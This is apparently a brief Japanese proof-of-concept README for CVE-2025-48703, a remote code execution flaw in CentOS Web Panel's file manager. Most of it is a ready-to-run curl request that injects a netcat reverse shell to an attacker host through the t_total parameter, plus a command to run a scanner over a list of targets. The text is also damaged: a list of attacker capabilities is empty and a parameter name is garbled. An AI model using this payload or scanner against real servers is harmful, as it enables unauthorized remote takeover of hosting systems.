
CentOS Web Panelでのリモートコード実行
CVE-2025-48703 は、ウェブホスティングコントロールパネル(例:cPanel)の filemanager モジュールにおけるリモートコード実行(RCE)の脆弱性です。これは、acc=changePerm 関数における 未サニタイズの入力処理 が原因で発生し、攻撃者が t_total パラメータを使用して任意のシステムコマンドを注入・実行することを可能にします。
この脆弱性により、攻撃者は以下が可能になります:
⚠️ この攻撃は、最小限の認証で、または一部の構成では認証なしで実行できます。
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
--data 'fileName=.bashrc¤tPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'
python3 Scanner.py #Make sure targets.txt is in the same dir
Server: cwpsrv